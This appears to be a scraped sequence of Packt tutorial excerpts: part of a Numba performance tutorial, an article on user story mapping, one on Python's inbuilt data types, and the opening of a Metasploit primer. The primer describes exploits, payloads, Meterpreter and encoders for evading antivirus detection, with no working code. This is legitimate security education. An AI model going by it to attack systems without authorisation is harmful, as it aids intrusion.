    # a = arg(0, name=a) :: array(float64, 1d, A)
    # $0.1 = global(len: <built-in function len>) :: Function(<built-in function len>)
    # $0.3 = call $0.1(a) :: (array(float64, 1d, A),) -> int64
    # N = $0.3 :: int64

    N = len(a)

For each line, Numba prints a thorough description of variables, functions, and intermediate results. In the preceding example, you can see (second line) that the argument a is correctly identified as an array of float64 numbers. At LINE 4, the input and return types of the len function are also correctly identified (and likely optimized) as taking an array of float64 numbers and returning an int64. If you scroll through the output, you can see how all the variables have a well-defined type.
Therefore, we can be certain that Numba is able to compile the code quite efficiently. This form of compilation is called native mode.

As a counterexample, we can see what happens if we write a function with unsupported operations. For example, as of version 0.30.1, Numba has limited support for string operations. We can implement a function that concatenates a series of strings and compile it as follows:

    @nb.jit
    def concatenate(strings):
        result = ''
        for s in strings:
            result += s
        return result

Now, we can invoke this function with a list of strings and inspect the types:

    concatenate(['hello', 'world'])
    concatenate.signatures
    # Output: [(reflected list(str),)]

    concatenate.inspect_types()

Numba will return the output of the function for the reflected list (str) type. We can, for instance, examine how line 3 gets inferred. The output of concatenate.inspect_types() is reproduced here:

    # --- LINE 3 ---
    # strings = arg(0, name=strings) :: pyobject
    # $const0.1 = const(str, ) :: pyobject
    # result = $const0.1 :: pyobject
    # jump 6
    # label 6

    result = ''

You can see how, this time, each variable or function is of the generic pyobject type rather than a specific one. This means that, in this case, Numba is unable to compile this operation without the help of the Python interpreter. Most importantly, if we time the original and compiled functions, we note that the compiled function is about three times slower than its pure Python counterpart:

    x = ['hello'] * 1000

    %timeit concatenate.py_func(x)
    10000 loops, best of 3: 111 µs per loop

    %timeit concatenate(x)
    1000 loops, best of 3: 317 µs per loop

This is because the Numba compiler is not able to optimize the code and adds some extra overhead to the function call. As you may have noted, Numba compiled the code without complaints even though it is inefficient. The main reason for this is that Numba can still compile other sections of the code in an efficient manner while falling back to the Python interpreter for other parts of the code.
This compilation strategy is called object mode. It is possible to force the use of native mode by passing the nopython=True option to the nb.jit decorator. If, for example, we apply this decorator to our concatenate function, we observe that Numba throws an error on the first invocation:

    @nb.jit(nopython=True)
    def concatenate(strings):
        result = ''
        for s in strings:
            result += s
        return result

    concatenate(x)
    # Exception:
    # TypingError: Failed at nopython (nopython frontend)

This feature is quite useful for debugging and ensuring that all the code is fast and correctly typed.

Numba and NumPy

Numba was originally developed to easily increase the performance of code that uses NumPy arrays. Currently, many NumPy features are implemented efficiently by the compiler.

Universal functions with Numba

Universal functions are special functions defined in NumPy that are able to operate on arrays of different sizes and shapes according to the broadcasting rules. One of the best features of Numba is its implementation of fast ufuncs. We have already seen some ufunc examples in article 3, Fast Array Operations with NumPy and Pandas. For instance, the np.log function is a ufunc because it can accept scalars and arrays of different sizes and shapes. Also, universal functions that take multiple arguments still work according to the broadcasting rules. Examples of universal functions that take multiple arguments are np.add and np.subtract.

Universal functions can be defined in standard NumPy by implementing the scalar version and using the np.vectorize function to enhance the function with the broadcasting feature. As an example, we will see how to write the Cantor pairing function. A pairing function is a function that encodes two natural numbers into a single natural number so that you can easily interconvert between the two representations.
The Cantor pairing function can be written as follows:

    import numpy as np

    def cantor(a, b):
        return int(0.5 * (a + b)*(a + b + 1) + b)

As already mentioned, it is possible to create a ufunc in pure Python using the np.vectorize decorator:

    @np.vectorize
    def cantor(a, b):
        return int(0.5 * (a + b)*(a + b + 1) + b)

    cantor(np.array([1, 2]), 2)
    # Result:
    # array([ 8, 12])

Except for the convenience, defining universal functions in pure Python is not very useful, as it requires a lot of function calls affected by interpreter overhead. For this reason, ufunc implementation is usually done in C or Cython, but Numba beats all these methods with its convenience. All that is needed to perform the conversion is to use the equivalent decorator, nb.vectorize. We can compare the speed of the standard np.vectorize version (which, in the following code, is called cantor_py) against the same function implemented using standard NumPy operations:

    # Pure Python
    %timeit cantor_py(x1, x2)
    100 loops, best of 3: 6.06 ms per loop

    # Numba
    %timeit cantor(x1, x2)
    100000 loops, best of 3: 15 µs per loop

    # NumPy
    %timeit (0.5 * (x1 + x2)*(x1 + x2 + 1) + x2).astype(int)
    10000 loops, best of 3: 57.1 µs per loop

You can see how the Numba version beats all the other options by a large margin! Numba works extremely well because the function is simple and type inference is possible. An additional advantage of universal functions is that, since they depend on individual values, their evaluation can also be executed in parallel. Numba provides an easy way to parallelize such functions by passing the target="cpu" or target="gpu" keyword argument to the nb.vectorize decorator.

Generalized universal functions

One of the main limitations of universal functions is that they must be defined on scalar values. A generalized universal function, abbreviated gufunc, is an extension of universal functions to procedures that take arrays. A classic example is matrix multiplication.
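Since a pairing function is meant to be invertible, it can help to see the round trip spelled out. The following pure-Python sketch adds an inverse that is not shown in the original text, so treat it as a supplementary illustration; the integer formulation avoids the floating-point 0.5 used above:

```python
import math

def cantor(a, b):
    # Cantor pairing: encode two natural numbers as one.
    return (a + b) * (a + b + 1) // 2 + b

def cantor_inverse(z):
    # Recover (a, b) from z by first locating the diagonal index w.
    w = (math.isqrt(8 * z + 1) - 1) // 2
    t = w * (w + 1) // 2  # value at the start of diagonal w
    b = z - t
    a = w - b
    return a, b

print(cantor(1, 2))       # 8, matching the array([ 8, 12]) example above
print(cantor_inverse(8))  # (1, 2)
```

Every pair of natural numbers maps to a distinct integer, and the inverse recovers it exactly, which is what makes the encoding usable as a round-trip representation.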
In NumPy, matrix multiplication can be applied using the np.matmul function, which takes two 2D arrays and returns another 2D array. An example usage of np.matmul is as follows:

    a = np.random.rand(3, 3)
    b = np.random.rand(3, 3)

    c = np.matmul(a, b)
    c.shape
    # Result:
    # (3, 3)

As we saw in the previous subsection, a ufunc broadcasts the operation over arrays of scalars; its natural generalization is to broadcast over an array of arrays. If, for instance, we take two arrays of 3 by 3 matrices, we expect np.matmul to match up the matrices and take their products. In the following example, we take two arrays containing 10 matrices of shape (3, 3). If we apply np.matmul, the product will be applied matrix-wise to obtain a new array containing the 10 results (which are, again, (3, 3) matrices):

    a = np.random.rand(10, 3, 3)
    b = np.random.rand(10, 3, 3)

    c = np.matmul(a, b)
    c.shape
    # Output:
    # (10, 3, 3)

The usual rules for broadcasting work in a similar way. For example, if we have an array of (3, 3) matrices with a shape of (10, 3, 3), we can use np.matmul to calculate the matrix multiplication of each element with a single (3, 3) matrix. According to the broadcasting rules, the single matrix will be repeated to obtain a size of (10, 3, 3):

    a = np.random.rand(10, 3, 3)
    b = np.random.rand(3, 3) # Broadcasted to shape (10, 3, 3)

    c = np.matmul(a, b)
    c.shape
    # Result:
    # (10, 3, 3)

Numba supports the implementation of efficient generalized universal functions through the nb.guvectorize decorator. As an example, we will implement a function that computes the Euclidean distance between two arrays as a gufunc. To create a gufunc, we have to define a function that takes the input arrays, plus an output array where we will store the result of our calculation.
The nb.guvectorize decorator requires two arguments:

The types of the input and output: two 1D arrays as input and a scalar as output

The so-called layout string, which is a representation of the input and output sizes; in our case, we take two arrays of the same size (denoted arbitrarily by n), and we output a scalar

In the following example, we show the implementation of the euclidean function using the nb.guvectorize decorator:

    @nb.guvectorize(['float64[:], float64[:], float64[:]'], '(n),(n)->()')
    def euclidean(a, b, out):
        N = a.shape[0]
        out[0] = 0.0
        for i in range(N):
            out[0] += (a[i] - b[i])**2

There are a few very important points to be made. Predictably, we declared the types of the inputs a and b as float64[:], because they are 1D arrays. However, what about the output argument? Wasn't it supposed to be a scalar? Yes; however, Numba treats scalar arguments as arrays of size 1. That's why it was declared as float64[:]. Similarly, the layout string indicates that we have two arrays of size (n) and the output is a scalar, denoted by empty brackets--(). However, the array out will be passed as an array of size 1. Also, note that we don't return anything from the function; all the output has to be written in the out array.

The letter n in the layout string is completely arbitrary; you may choose to use k or other letters of your liking. Also, if you want to combine arrays of uneven sizes, you can use layout strings such as (n, m).

Our brand new euclidean function can be conveniently used on arrays of different shapes, as shown in the following example:

    a = np.random.rand(2)
    b = np.random.rand(2)
    c = euclidean(a, b) # Shape: (1,)

    a = np.random.rand(10, 2)
    b = np.random.rand(10, 2)
    c = euclidean(a, b) # Shape: (10,)

    a = np.random.rand(10, 2)
    b = np.random.rand(2)
    c = euclidean(a, b) # Shape: (10,)

How does the speed of euclidean compare to standard NumPy?
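Before timing it, we can verify what euclidean actually computes with a short pure-Python reference. This check is not in the original text; note that, as written, the gufunc accumulates (a[i] - b[i])**2 without a final square root, so for each row it returns the squared Euclidean distance:

```python
def euclidean_ref(a, b):
    """Row-wise squared Euclidean distance between two sequences of points."""
    return [sum((x - y) ** 2 for x, y in zip(row_a, row_b))
            for row_a, row_b in zip(a, b)]

a = [[0.0, 0.0], [1.0, 1.0]]
b = [[3.0, 4.0], [1.0, 1.0]]
print(euclidean_ref(a, b))  # [25.0, 0.0]
```

This mirrors the NumPy expression ((a - b)**2).sum(axis=1) used in the benchmark that follows, so all three versions can be checked against each other on small inputs.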
In the following code, we benchmark a NumPy vectorized version against our previously defined euclidean function:

    a = np.random.rand(10000, 2)
    b = np.random.rand(10000, 2)

    %timeit ((a - b)**2).sum(axis=1)
    1000 loops, best of 3: 288 µs per loop

    %timeit euclidean(a, b)
    10000 loops, best of 3: 35.6 µs per loop

The Numba version, again, beats the NumPy version by a large margin!

Summary

Numba is a tool that compiles fast, specialized versions of Python functions at runtime. In this article, we learned how to compile, inspect, and analyze functions compiled by Numba. We also learned how to implement fast NumPy universal functions that are useful in a wide array of numerical applications. Tools such as PyPy allow us to run Python programs unchanged to obtain significant speed improvements. We demonstrated how to set up PyPy, and we assessed the performance improvements on our particle simulator application.
User Story Map – The First User Experience Map in a Product’s Life

Packt
23 Jun 2017
18 min read
In this article by Peter W. Szabo, the author of the book User Experience Mapping, we will explore user story maps. User story maps solve the user's problems in the form of a discussion. Your job as a product manager or user experience consultant should be to make the world better through user-centric products--essentially, solving the user's problems. Contrary to popular belief, user story maps are not just cash cows for agile experts. They will help a product to succeed by increasing the team's understanding of the system--not just what's inside it, but what will happen to the world as a result. By focusing on the opportunity and outcomes, the team can prioritize development. In reality, this often means stopping the proliferation of features, and underdoing your competition.

Wait a minute, did you just read underdoing? As in, fewer features, not making bold promises, and significantly less customizability and fewer options? Yes indeed. The founders of Basecamp (formerly 37signals) are the champions of building less. In their book ReWork: Change the Way You Work Forever, they tell Basecamp's success story while giving vital advice to anyone trying to build a product or run a startup:

"When things aren't working, the natural inclination is to throw more at the problem. More people, time, and money. All that ends up doing is making the problem bigger. The right way to go is the opposite direction: Cut back. So do less. Your project won't suffer nearly as much as you fear. In fact, there's a good chance it'll end up even better." (Jason Fried)

User story maps will help you to throw less at the problem, chopping down extras until you reach an awesome product, which is actually done. One of the problems with long product backlogs or nightmarish requirement documents is that they never get done. Literally never. Once I had to work on improving the user experience of a bank's backend.
It was a gargantuan task, as this backend was a large collection of distributed microservices, which meant hundreds of different forms with hard-to-understand functions and a badly designed multi-level menu that connected them together. I knew almost nothing about banking, and they knew almost nothing about UX, so this was a match made in heaven. They gave me a twelve-page document. That was just the non-disclosure agreement. The project had many 100+ page documents detailing various things and how they are done, complete with business processes and banking jargon. They wanted us to compile an expert review on what needed to be redesigned and create a detailed strategy for that. I found a better use of their money than wasting time on expert reviews and redesign strategies at that stage. Recording or even watching bank employees while they used the system during their work was out of the question. So we went for the quick win and did user story mapping in the first week of the project.

Among the attendees of the user story mapping sessions, there were a few non-manager level bank employees who used the backend extensively. One of them was quite new to her job, but fortunately, quite talkative about it. It was immediately evident that most employees almost never used at least 95% of the functionality. Those functions were reserved for specially trained people, usually managers. After creating the user story map with the most essential and frequently used features, I suggested a backend interface that only contained about 1% of the functionality of the old system at first, with the mention of other features to be added later. (As a UX consultant, you should avoid saying no; instead, try saying later. It has the same effect for the project but keeps everyone happy.) No one in the room believed that such a crazy idea would go through senior management, although they supported the proposal. Quite the contrary, it went extremely well with senior management.
The senior managers understood that by creating a simple and fast backend user interface, they would be able to reduce the queues without hiring new employees. Moreover, if they needed to hire people, training would be easier and faster. The new UI could also reduce the number of human errors. Almost all of the old backend was still online two years later, although used only by a few employees. This made both the product and the information security teams happy, not to mention HR. The functionality of the new application extended only slightly in 24 months. Nobody complained, and the bank's customers were happy with smaller queues. All this was achieved with a pack of colored sticky notes, some markers, and, much more importantly, a discussion and shared understanding. This is just one example of how a simple technique like user story mapping can save millions of dollars for a company. (For more resources related to this topic, see here.)

Just tell the story

Drawing a map, any map, will lead to solving the problem. User story maps aim to replace document hand-overs with discussions and collaboration. Enterprises tend to have some sort of formal approval process, usually with a sign-off. That's perfectly fine, and most of the time unavoidable. Just make sure that the sign-off happens after the mapping and story discussions--ideally, right after the discussion, not days or weeks later. There is a reason why product managers, UX experts, and all stakeholders love stories: they are humans. As such, we all have a natural tendency to love an emotionally satisfying tale. Most of our entertainment revolves around stories, and we want to hear good stories. A great story revolves around conflicts in a memorable and exciting way.

How to tell a story?

Telling a story is an easy task. We all did it as kids, yet we tend to forget that skill we possess when we get into a serious product management discussion. How to tell a great story?
There are a few rules to consider; the most important one is that you should talk about something that captivates the audience.

The audience

You should focus on the audience. What are their problems? What would make them listen actively, instead of texting or catching Pokémon, while at a user story discussion? Even if the project is about scratching your own itch, you should spin the story so it's their itch that is scratched. Engaging the audience can indeed be a challenge. Once upon a time I wrote a sci-fi novel. Actually, it was published in 2000, with the title Tűzsugár, in Hungarian. The English title would be Ray of Fire, but fortunately for my future writing career, it was never translated into English. The book had everything my 15-16-year-old self considered fun: for instance, a great space war or passionate love between members of different sapient spacefaring races. The characters were miscellaneous human and non-human life-forms stuck in a spaceship for most of the story. Some of my characters had a keen resemblance to miscellaneous video-game characters, from games like Mortal Kombat 2 or Might & Magic VI. They certainly lacked emotional struggles over insignificant things like mass murder or the end of the universe. As I certainly hope you will never read that book, I will spoil the ending for you. A whole planet died, hinting that the entire galaxy might share the same fate, with a faint hope for salvation. This could have led to a sequel, but fortunately for all sci-fi lovers, I stopped writing the sequel after nine chapters. The book seemed to be a success. A national TV channel made an interview with me, if that's any measure of success. More importantly, I had lots of fun writing it. But the book itself was hard to understand and probably impossible to appreciate. My biggest mistake was writing only what I considered fun. To be honest, I still write for fun, but now I have an audience in mind. 
I tell the story of my passion for user experience mapping to a great audience: you. I try to find things that are fun to write and still interesting to my target audience. As a true UX geek, I create the main persona of my audience before writing anything and tell a story to her. This article's main persona is called Maya, and she shares many traits with my daughter. Could I say I'm writing this book for my daughter? Of course I do, but I keep in mind all other personas. Hopefully one of them is a bit like you. Before a talk at a conference, I always ask the organizers about the audience. Even if the topic stays the same, the audience completely changes the story and the way I present it. I might tell the same user story differently to one of my team members, to the leader of another team, or to a chief executive. Differently internally, to a client, or to a third party. When telling a story, contrary to a written story, you will see immediate feedback, or the lack of it, from your audience. You should go even further and shape the story based on this feedback. Telling a story is an interactive experience. Engage with the audience. Ask them questions, and let them ask you questions as a start; then turn this into a shared storytelling experience, where the story is being told by all participants together (not at the same time, though, unless you turn the workshop into a UX carol). When you tell a fairy tale to your daughter, she might ask why the princess can't escape using her sharp wits and cunning, instead of relying on a prince challenging the dragon to a bloody duel. (Then you might start appreciating the story of My Little Pony, where the girl ponies solve challenges mostly non-violently while working together as a team of friends, instead of acting as a prize to be won.) So why not spin a tale of heroic princesses with fluffy pink cats?   
Start with action

Beginning in medias res, as in starting the narrative in the midst of action, is a technique used by masters such as Shakespeare or Homer, and it is also a powerful tool in your user story arsenal. While telling a story, always try to add as little background as possible, and start with drama or something to catch the attention of the audience, whenever possible. At the beginning of The Odyssey, quite a few unruly men want to marry Telemachus' mother, while his father has still not returned home from the Trojan War. There is no lengthy introduction explaining how those men ended up in Ithaca, or why the goddess, flashing-eyed Athena, cares about Odysseus. The poem was composed in an oral tradition and was more likely to be heard than read at the time of composition. While literacy has skyrocketed since Homer's time, you want to tell and discuss your user stories. Therefore you should consider a similar start. (Maybe not mentioning the user's mother or her rascally suitors.)

Simplify

In literary fiction, a complex story can be entertaining. A Game of Thrones and its sequels in the A Song of Ice and Fire series are a good example of that. The thing is, George R. R. Martin writes those novels, and he certainly has no intention of discussing them during sprint planning meetings with stakeholders. User story maps are more similar to sagas, folktales and other stories formed in an oral tradition. They develop in a discussion, and their understandability is granted by their simplicity. We need to create a map as simple and small as possible, with as few story cards as possible. So how big should the story map be? Jim Shore defines story card hell as something that happens when you have 300 story cards and you have to keep track of them. Madness, huh? This is not Sparta! Sorry Jim for the bad pun, but you are absolutely right: in the 300 range, you will not understand the map, and the whole discussion part will completely fail. 
The user stories will be lost, and the audience will not even try to understand what's happening. There is no ideal number of cards in a story map, but aim low. Then eliminate most of the cards. Clutter will destroy the conversation. In most card games you will have from two to seven cards in hand, with some rare exceptions. The most popular card game both online and offline is Texas Hold 'em Poker. In that game, each player is dealt only two cards. This is because human thought processes and discussions work best with a small number of objects. Sometimes the number of objects in the real world is high. Our mind is good at simplifying, classifying and grouping things into manageable units. With that said, most books and conference presentations about user story mapping show us a photo of a wall covered with sticky notes. The viewer will have absolutely no idea what's on them, but one thing is certain: it looks like a complex project. I have bad news for you: projects with a complex user story map never get finished, and if they do get finished to a degree, they will fail. The abundance of sticky notes means that the communication and simplification process needs one or more iterations. Throw away most of the sticky notes! To do that, you need to understand the problem better.

Tell the story of your passion

Seriously. Find someone, and tell her the user story of the next big thing. The app or hardware which will change the world. Try it now. Be bold and let your imagination flow. I believe that in this century we will be able to digitalize human beings. This will be the key to both humankind's survival as a species and our exploration of space. The digital society would have no famine, no plagues and no poverty. This would solve all major problems we face today. Digital humans would even defeat death. Sounds like a wild sci-fi idea? It is, but then again, smartphones were also a wild sci-fi idea a few decades ago. 
Now I will tell you the story of something we can build today.

The grocery surplus webshop

We will create the user story map for a grocery surplus webshop. Using this eCommerce site, we will sell clearance food and drink at a discount price. This means food that would be thrown away at a regular store, for example food past its expiry date or with damaged packaging. This idea is popular in developed countries, like Denmark or the UK, and it might help cut down on the amount of food wasted every year, totaling 1.3 billion metric tonnes worldwide. We are trying to create the online-only version of WeFood (https://donate.danchurchaid.org/wefood). Our users can be environmentally conscious shoppers or low-income families with limited budgets, just to give two examples. In this article I will not introduce personas and treat them separately, so for now we will only think about them as shoppers.

The opportunity to scratch your own itch

Mapping will help you to achieve the most with as little as possible. In other words: maximize the opportunity, while minimizing the outputs. To use the mapping lingo: the outputs are products of the map's usage, while the outcomes are the results. The opportunity is the desired outcome we plan to achieve with the aid of the map. This is how we want to change the world. We should start the map with the opportunity. The opportunity should not be defined as selling surplus food and drink to our visitors. If you approach a project or a business without solving the users' problem, the project might become a failure. The best way to find out what our users want is through valid user research, remote and lab-based user experience testing. Sometimes we need to settle for the second best solution, which happens to be free. That's solving your own problem, in other words, scratching your own itch. 
Probably the best summary of this mantra comes from Jason Fried, the founder and CEO of Basecamp: “When you solve your own problem, you create a tool that you're passionate about. And passion is key. Passion means you'll truly use it and care about it. And that's the best way to get others to feel passionate about it too.” (Getting Real: The Smarter, Faster, Easier Way to Build a Successful Web Application) We will create the web store we would love to use. Although, as the cliché goes, there is no I in team, there is certainly an I in writer. My ideal eCommerce site could be different from yours. When following the examples of this article, please try to think of your itch, your ideal web store, and use my words only as guidance. You can create the user story map for any other project, ideally something you are passionate about. I would encourage you to pick something that's not a webshop, or maybe not even a digital product, if you feel adventurous. You need to tell the story of your passion. (No, not that passion. This is not an adults-only website.) My passion is reducing food waste (that's also the poor excuse I'm using when looking at the bathroom scale). Here is my attempt to phrase the opportunity. The opportunity: Our shoppers want to save money while reducing global food waste. They understand and accept what surplus food and drink means, and they are happy to shop with us. Actually, the first sentence would be enough. Remember, you want to have a simple one- or two-sentence opportunity definition. I ended up working for two tapestry web shops as a consultant. Not at the same time, though, and the second company approached me mostly as the result of how successful the first one was. It's a relatively small industry in Europe, and business owners and decision-makers know each other by name. I still recall the pleasant experience I had meeting the owners of the first web shop. 
They invited me to dinner at a homely restaurant in Budapest. We had a great discussion and they shared their passion. They were an elderly couple, so they must have spent most of their lives in the communist era. In the early 90's they decided to start a business, selling tapestry in a brick and mortar store. Obviously, they had no background in management or running a capitalist business, but that didn't matter; they only wanted to help people make their homes beautiful. They loved tapestry, so they started importing and selling it. When I visited their physical store I saw them talking to a customer. They spent more than an hour discussing interior decoration with someone who just popped by to ask the square meter price of tapestry. Tapestry is not sold per square meter, but they did the math for the customer, among many other things. They showed her many different patterns and types and discussed application methods. After leaving the shop, the customer knew more about tapestry than most other people ever will. Fast forward to the second contract. I only talked to the client on Skype, and that's perfectly fine, because most of my clients don't invite me to dinner. I saw many differences between this client's approach and the previous one. At some point, I asked him: “Why do you sell tapestry? Is tapestry your passion?” He was a bit startled by the question, but he promptly replied: “To make money, why else? You need to be pretty crazy to have tapestry as a passion.” Seven years later the second business no longer exists, yet the first one is still successful. Treating your work as your passion works wonders. Passion is an important contributor to the success of an idea. Whenever possible, pour your passion into a product and summarize it as the opportunity.

What’s next?

If you buy my new book, User Experience Mapping, you will find more about user story maps in the second chapter. 
In that chapter, we will explore user story maps, and how they help you to create requirements through collaboration (and a few sticky notes):

We will create user stories and arrange them as a user story map.
We will discuss the reasons behind creating them.
We will learn how to tell a story.

The grocery surplus webshop's user story map will be the example I will create in that chapter. To do this, we will explore user story templates, characteristics of a good user story (INVEST) and epics. With the 3 Cs (Card, Conversation and Confirmation) process we will turn the stories into reality. We will create a user story map on a wall with sticky notes, then digitally using StoriesOnBoard. And that's just the second chapter; each of the eleven chapters contains different user experience maps. The book reveals two advanced mapping techniques for the first time in print: the behavioural change map and the 4D UX map. You will also explore user story maps, task models and journey maps. You will create wireflows, mental model maps, ecosystem maps and solution maps. In this book, we will show you how to use insights from real users to create and improve your maps and your product. Start mapping your products now to change your users' lives!

Resources for Article:
Further resources on this subject:
Learning D3.js Mapping
Data Acquisition and Mapping
Creating User Interfaces
Inbuilt Data Types in Python
Packt
22 Jun 2017
4 min read
This article by Benjamin Baka, author of the book Python Data Structures and Algorithms, explains the inbuilt data types in Python. Python data types can be divided into three categories: numeric, sequence and mapping. There is also the None object that represents a Null, or absence of a value. It should not be forgotten either that other objects such as classes, files and exceptions can also properly be considered types; however, they will not be considered here. (For more resources related to this topic, see here.) Every value in Python has a data type. Unlike many programming languages, in Python you do not need to explicitly declare the type of a variable. Python keeps track of object types internally. Python's inbuilt data types are outlined in the following table:

Category   Name       Description
None       None       The null object
Numeric    int        Integer
           float      Floating point number
           complex    Complex number
           bool       Boolean (True, False)
Sequences  str        String of characters
           list       List of arbitrary objects
           tuple      Group of arbitrary items
           range      A range of integers
Mapping    dict       Dictionary of key-value pairs
           set        Mutable, unordered collection of unique items
           frozenset  Immutable set

None type

The None type is immutable and has one value, None. It is used to represent the absence of a value. It is returned by objects that do not explicitly return a value and evaluates to False in Boolean expressions. It is often used as the default value in optional arguments to allow the function to detect if the caller has passed a value.

Numeric types

All numeric types, apart from bool, are signed and they are all immutable. Booleans have two possible values, True and False. These values are mapped to 1 and 0 respectively. The integer type, int, represents whole numbers of unlimited range. Floating point numbers are represented by the native double precision floating point representation of the machine. Complex numbers are represented by two floating point numbers. 
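As a quick check of the table, the following sketch (my addition, not from the original article) builds one literal of each category and confirms the type name Python reports for it, with no declarations needed:

```python
# One value from each category in the table above; type() reports
# the inbuilt type Python assigned to each value internally.
samples = {
    "int": 42,
    "float": 3.14,
    "complex": 2 + 3j,
    "bool": True,
    "str": "spam",
    "list": [1, 2, 3],
    "tuple": (1, 2, 3),
    "range": range(5),
    "dict": {"a": 1},
    "set": {1, 2, 3},
    "frozenset": frozenset({1, 2}),
    "NoneType": None,
}

for name, value in samples.items():
    # No type declarations anywhere: the type travels with the object.
    assert type(value).__name__ == name, name
```

Running the loop raises no assertion, confirming each literal maps to the expected inbuilt type.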
They are assigned using the j operator to signify the imaginary part of the complex number. For example:

a = 2+3j

We can access the real and imaginary parts with a.real and a.imag respectively.

Representation error

It should be noted that the native double precision representation of floating point numbers leads to some unexpected results. For example, consider the following:

In [14]: 1-0.9
Out[14]: 0.09999999999999998

In [15]: 1-0.9 == 0.1
Out[15]: False

This is a result of the fact that most decimal fractions are not exactly representable as a binary fraction, which is how most underlying hardware represents floating point numbers. For algorithms or applications where this may be an issue, Python provides a decimal module. This module allows for the exact representation of decimal numbers and facilitates greater control of properties such as rounding behaviour, number of significant digits and precision. It defines two objects: a Decimal type, representing decimal numbers, and a Context type, representing various computational parameters such as precision, rounding and error handling. An example of its usage can be seen in the following:

In [1]: import decimal
In [2]: x = decimal.Decimal(3.14); y = decimal.Decimal(2.74)
In [3]: x*y
Out[3]: Decimal('8.603600000000001010036498883')
In [4]: decimal.getcontext().prec = 4
In [5]: x*y
Out[5]: Decimal('8.604')

Here we have created a global context and set the precision to 4. A Decimal object can be treated pretty much as you would treat an int or a float. It is subject to all the same mathematical operations, can be used as a dictionary key, placed in a set, and so on. In addition, Decimal objects also have several methods for mathematical operations, such as natural exponents, x.exp(), natural logarithms, x.ln(), and base 10 logarithms, x.log10(). Python also has a fractions module that implements a rational number type. 
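Before moving on to fractions, here is a small self-contained sketch (my addition, not from the original article) tying the two snippets above together. Note that a Decimal built from a float inherits the binary representation error, while one built from a string is exact, so the comparison that failed for floats succeeds:

```python
from decimal import Decimal

# Built from a float, the Decimal captures the float's binary error exactly:
assert Decimal(0.1) != Decimal("0.1")

# The float comparison from the article still fails...
assert (1 - 0.9) != 0.1

# ...but with string-constructed Decimals the arithmetic is exact:
assert Decimal("1") - Decimal("0.9") == Decimal("0.1")
```

This is why Decimals intended for exact arithmetic are usually constructed from strings or integers rather than from floats.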
The following shows several ways to create fractions:

In [62]: import fractions
In [63]: fractions.Fraction(3, 4)  # creates the fraction 3/4
Out[63]: Fraction(3, 4)
In [64]: fractions.Fraction(0.5)  # creates a fraction from a float
Out[64]: Fraction(1, 2)
In [65]: fractions.Fraction(".25")  # creates a fraction from a string
Out[65]: Fraction(1, 4)

It is also worth mentioning here the NumPy extension. This has types for mathematical objects such as arrays, vectors and matrices, and capabilities for linear algebra, calculation of Fourier transforms, eigenvectors, logical operations and much more.

Summary

We have looked at the inbuilt data types and some internal Python modules, most notably the decimal and fractions modules. There are also a number of external libraries, such as the SciPy stack.

Resources for Article:
Further resources on this subject:
Python Data Structures [article]
Getting Started with Python Packages [article]
An Introduction to Python Lists and Dictionaries [article]
Getting Started with Metasploit
Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics:

Fundamentals of Metasploit
Benefits of using Metasploit

(For more resources related to this topic, see here.) Penetration testing is the art of performing a deliberate attack on a network, web application, server or any device that requires a thorough checkup from the security perspective. The idea of a penetration test is to uncover flaws while simulating real-world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most practical tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more.

The fundamentals of Metasploit

Now that we have completed the setup of Kali Linux, let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D. Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features. 
Metasploit comes in various editions, as follows:

Metasploit Pro: This is a commercial edition that offers tons of great features such as web application scanning and exploitation and automated exploitation, and is quite suitable for professional penetration testers and IT security teams. The Pro edition is used for advanced penetration tests and enterprise security programs.

Metasploit Express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute forcing of credentials, and much more. This version is quite suitable for IT security teams in small to medium size companies.

Metasploit Community: This is a free version with reduced functionalities compared to the Express edition. However, for students and small businesses, this edition is a favorable choice.

Metasploit Framework: This is a command-line version with all manual tasks such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers.

You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/

We will be using the Metasploit Community and Framework versions. Metasploit also offers various types of user interfaces, as follows:

The graphical user interface (GUI): This has all the options available at the click of a button. This interface offers a user-friendly experience that helps to provide cleaner vulnerability management.

The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all-in-one approach to all the options offered by Metasploit. It is also considered one of the most stable interfaces.

The command-line interface: This is the more potent interface that supports the launching of exploits to activities such as payload generation. 
However, remembering each and every command while using the command-line interface is a difficult job.

Armitage: Armitage, by Raphael Mudge, added a neat hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortana scripting language.

Basics of the Metasploit framework

Before we put our hands onto the Metasploit framework, let us understand the basic terminologies used in Metasploit. However, the following are not just terminologies but modules that are the heart and soul of the Metasploit project:

Exploit: This is a piece of code which, when executed, will trigger the vulnerability at the target.

Payload: This is a piece of code that runs at the target after successful exploitation. It defines the type of access and actions we need to gain on the target system.

Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more.

Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.

Meterpreter: This is a payload that uses in-memory stagers based on DLL injection. It provides a variety of functions to perform at the target, which makes it a popular choice.

Architecture of Metasploit

Metasploit comprises various components such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows: Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. 
Let's understand the use of the various libraries, as follows:

REX: Handles almost all core functions such as setting up sockets, connections, formatting, and all other raw functions.
MSF CORE: Provides the underlying API and the actual core that describes the framework.
MSF BASE: Provides friendly API support to modules.

